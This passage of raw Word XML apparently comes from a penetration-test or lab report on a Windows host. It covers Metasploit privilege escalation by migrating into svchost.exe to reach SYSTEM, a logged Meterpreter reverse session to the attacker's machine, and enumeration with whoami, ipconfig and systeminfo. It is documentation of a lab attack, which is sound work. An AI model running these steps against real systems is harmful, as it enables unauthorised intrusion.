      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2 — Privilege Escalation to NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FA3DBA" w14:textId="1E5D282A" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00D22F4D" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When the module was instantiated, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>InitAutoRunScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (post/windows/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>priv_migrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">) of the module automatically tried to migrate privileges. It was established that the session was running in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>foow.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\Administrator (Admin but not SYSTEM) and did not migrate to services.exe and winit.exe. Migration to svchost.exe (PID 844) was successful and increased the session to NT AUTHORITY SYSTEM</w:t>
      </w:r>
      <w:r w:rsidR="00E32FA2" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1EF883"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 Successfully migrated to svchost.exe (844) as: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2230A1D1"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 Meterpreter session 1 opened (192.168.174.128:4444 -&gt; 192.168.174.155:63789)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBC9BCD" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BB84B3" w14:textId="72DEB64B" w:rsidR="00485A75" w:rsidRPr="00C668B5" w:rsidRDefault="00485A75" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65045155" wp14:editId="43FCEFF5">
            <wp:extent cx="5943600" cy="3533775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="105545691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42444039" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3533775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="193433AF" w14:textId="4042EFC9" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. </w:t>
      </w:r>
      <w:r w:rsidR="00F016B3" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The output of the session demonstrates that the NT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AUTHORity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM level of privilege was verified after the migration into the svchost.exe (844).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C20F0C" w14:textId="77777777" w:rsidR="00453791" w:rsidRPr="00C668B5" w:rsidRDefault="00453791">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF745B" w14:textId="664A4190" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3 — Shell Access and Identity Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D2FC45" w14:textId="77777777" w:rsidR="000A5A76" w:rsidRPr="00C668B5" w:rsidRDefault="000A5A76" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The Meterpreter session spawned a shell to perform post-exploitation enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10EBA6" w14:textId="2706AACB" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462CFFAB"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 xml:space="preserve">C:\Windows\system32&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47591E15"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C:\Windows\system32&gt; ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5AF72" w14:textId="31470DA4" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776AF9AE" wp14:editId="59DCA3FA">
            <wp:extent cx="5943600" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="127924050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9240506" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3543300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E88C12" w14:textId="401CF853" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. </w:t>
      </w:r>
      <w:r w:rsidR="00F016B3" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell output with a confirmation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> return is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D22F4D" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> authority system. The ipconfig-output ensures the network identity of the target.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7088"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="57A76D36" w14:textId="77777777" w:rsidTr="000D3F76">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263" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F52587E"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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5519BE54" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="1F8C6AA4" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D15A282"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IPv4 Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520832A9"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192.168.174.155</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="24BAF44A" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68E3E8F9"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Subnet Mask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6D78AB"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255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="6F92B51B" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="333A8F41"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Default Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68967851"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192.168.174.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="39674BFA" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3ACC69"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Link-local IPv6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CC0BEDE"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fe80::6324:9779:c04</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>d:edd</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>2%3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="1F5F88AF" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ADA7D14"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DNS Suffix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFD3824"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>localdomain</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BEA03B3" w14:textId="77777777" w:rsidR="00AD32BF" w:rsidRPr="00C668B5" w:rsidRDefault="00AD32BF" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD19BCE" w14:textId="77777777" w:rsidR="00453791" w:rsidRPr="00C668B5" w:rsidRDefault="00453791">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16003FAB" w14:textId="34C8221E" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4 — System Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E839858" w14:textId="105335E9" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F37BC4B" w14:textId="3B9CD8D9" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6E8B2F" wp14:editId="0DDE638B">
            <wp:extent cx="5943600" cy="3530600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7418362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183622" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3530600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F68A2" w14:textId="7828A6C2" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
